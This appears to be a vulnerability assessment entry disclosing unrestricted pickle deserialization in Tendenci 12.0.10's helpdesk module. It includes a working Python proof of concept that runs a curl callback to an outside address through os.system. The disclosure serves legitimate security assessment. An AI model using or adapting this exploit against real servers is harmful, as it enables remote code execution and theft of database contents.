Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.
Recent assessments:
kevthehermit at June 21, 2020 7:03pm UTC reported:
Untrusted data from the client side is used to create a python pickled object. This can lead to full RCE and compromise of the host. There are some limitations and this is not the default configuration.
If you can control the input it may be possible to gain code execution on the underlying server. With code execution you can gain full access to the database and its data.
The helpdesk module is not enabled by default.
A valid authenticated account with permissions to access /tickets
This doesnβt not appear to be patched in the latest release, although it has been acknowledged
It is fairly easy to create a functional POC against this target if the feature is enabled.
Modify the following POC to fit your needs.
import pickle
import base64
import os
class RCE:
def __reduce__(self):
cmd = ('curl 172.22.0.1:1234')
return os.system, (cmd,)
if __name__ == '__main__':
pickled = pickle.dumps(RCE())
print(base64.urlsafe_b64encode(pickled))
Assessed Attacker Value: 2
Assessed Attacker Value: 2Assessed Attacker Value: 4